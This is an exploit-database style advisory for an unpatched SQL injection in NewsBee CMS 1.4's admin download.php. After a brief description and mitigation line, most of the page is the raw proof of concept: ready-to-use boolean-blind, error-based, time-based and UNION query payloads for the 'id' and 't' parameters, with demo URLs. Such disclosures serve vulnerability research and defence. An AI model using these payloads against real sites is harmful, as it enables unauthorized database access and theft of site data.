NewsBee CMS 1.4 - 'download.php' SQL Injection

vendor:

NewsBee CMS

by:

Özkan Mustafa Akkus (AkkuS)

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: NewsBee CMS

Affected Version From: 1.4

Affected Version To: 1.4

Patch Exists: NO

Related CWE: N/A

CPE: a:codecanyon:newsbee:1.4

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Kali Linux

2018

NewsBee CMS 1.4 – ‘download.php’ SQL Injection

NewsBee CMS 1.4 is vulnerable to SQL Injection. The vulnerability exists in the 'download.php' file, where the 'id' and 't' parameters are vulnerable to SQL Injection. The exploitation of this vulnerability can be done using boolean-based blind, error-based, AND/OR time-based blind and UNION query techniques. The exploitation of this vulnerability can lead to the compromise of the application and the underlying system.

Mitigation:

Input validation should be done on the server-side to prevent SQL Injection attacks. The application should also be tested for SQL Injection vulnerabilities.

Source

Exploit-DB raw data:

# Exploit Title: NewsBee CMS 1.4 - 'download.php' SQL Injection
# Dork: N/A
# Date: 2018-05-22
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor Homepage: https://codecanyon.net/item/newsbee-fully-featured-news-cms-with-bootstrasp-php-mysql/19404937
# Version: 1.4 / fourth update
# Category: Webapps
# Tested on: Kali linux

# PoC: SQLi:
# Parameter: id
# Type: boolean-based blind
# Demo: http://Target/NewsBee/admin/download.php?id=578&t=gallery
# Payload: 

id=578' AND 2043=2043 AND 'KzTm'='KzTm&t=gallery

# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
# Payload: 

id=578' AND (SELECT 7126 FROM(SELECT
COUNT(*),CONCAT(0x7162787871,(SELECT
(ELT(7126=7126,1))),0x71766a7871,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'hOBA'='hOBA&t=gallery

# Type: AND/OR time-based blind
# Demo: http://Target/NewsBee/admin/download.php?id=578&t=gallery
# Payload: 

id=578' AND SLEEP(5) AND 'KlSV'='KlSV&t=gallery

# Type: UNION query
# Demo: http://Target/NewsBee/admin/download.php?id=578&t=gallery
# Payload: 

id=-1714' UNION ALL SELECT
NULL,NULL,CONCAT(0x7162787871,0x51487655536a566c616e5156496a6a56426267495670596f644f466f554753504469636d4358694c,0x71766a7871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
WSZd&t=gallery

# PoC: SQLi:
# Parameter: t
# Type: boolean-based blind
# Demo: http://Target/NewsBee/admin/download.php?id=578&t=gallery
# Payload: 

id=578&t=gallery` WHERE 7854=7854 AND 1059=1059#

# Type: error-based
# Demo: http://Target/NewsBee/admin/download.php?id=578&t=gallery
# Payload: 

id=578&t=gallery` WHERE 8962=8962 AND (SELECT 1892 FROM(SELECT
COUNT(*),CONCAT(0x7162787871,(SELECT
(ELT(1892=1892,1))),0x71766a7871,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- eLUC

# Type: AND/OR time-based blind
# Demo: http://Target/NewsBee/admin/download.php?id=578&t=gallery
# Payload: 

id=578&t=gallery` WHERE 5549=5549 AND SLEEP(5)-- RUaY